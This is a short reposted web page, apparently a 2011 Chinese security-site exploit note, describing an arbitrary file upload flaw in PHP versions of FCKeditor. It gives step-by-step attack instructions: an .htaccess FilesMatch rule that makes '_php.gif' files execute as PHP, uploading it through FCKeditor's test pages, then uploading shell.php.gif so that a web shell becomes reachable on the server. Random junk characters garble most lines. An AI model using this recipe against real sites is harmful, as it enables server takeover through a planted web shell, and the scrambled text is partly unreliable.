FCKeditor所有php版本Upload上传漏洞
+ Z: K9 D% r! L: v b作者:佚名 来源:本站整理 发布时间:2011-10-25 7:39:07
$ ]% b3 S2 o+ ^2 T Z) [减小字体 增大字体
( y* v3 S6 k3 c0 [& M9 x( t5 v4 k[+] Title:FCKeditor all versian Arbitrary File Upload Vulnerability @* R4 Q. k% A i! ~
[+] Date: 2011
/ I9 F* J% V0 d4 h- n: i: O[+] Author : sinesafe.cn
6 k9 T Q. m C1 e( k. o[+] Website : WwW.sinesafe.cn
' w/ @, u/ ~5 r1 S3 G8 {———————————————————) r6 r, \8 \. M0 \
1.create a htaccess file:
. |, B6 t2 M/ R" q. mcode:7 ?! G9 u, ~) a# R4 x. W& Z
<FilesMatch “_php.gif”>2 j% q1 \) b8 c) D7 o' Y$ }, r
SetHandler application/x-httpd-php
4 j0 }% F0 J; ~1 V- d" F0 q</FilesMatch>2 j7 n( v: m3 k6 [6 J( K+ F) @; {
! T, v7 z0 m4 i9 {$ Q2.Now upload this htaccess with FCKeditor.; ^8 p# V+ I- G* F) u1 B
& O. ?7 e- V8 Z: B/ nhttp://www.sinesafe.cn/FCKeditor ... er/upload/test.html2 Q* ]$ L+ B+ T A
7 @& I7 z( I' S2 K- shttp://www.sinesafe.cn/FCKeditor ... onnectors/test.html4 J7 i1 k* v% D$ i1 l
' K) {0 P4 s5 A5 V( f& W( d& y———————————————————————————————-. J7 O( e0 I' s) m! ~" P1 k6 U
3.Now upload shell.php.gif with FCKeditor.
4 O' j8 ~9 F0 S4 @4 e) M4.After upload shell.php.gif, the name “shell.php.gif” change to “shell_php.gif” automatically.9 Q# L$ c/ X8 @
5.http://www.sinesafe.cn/anything/shell_php.gif9 ` h1 o8 b! A: Z% n
6.Now shell is available from server. |
- _0 {4 b o; X+ Q; f! a8 a2 i( u+ G( u
7 x( b: |) h/ n1 i3 w- x' c |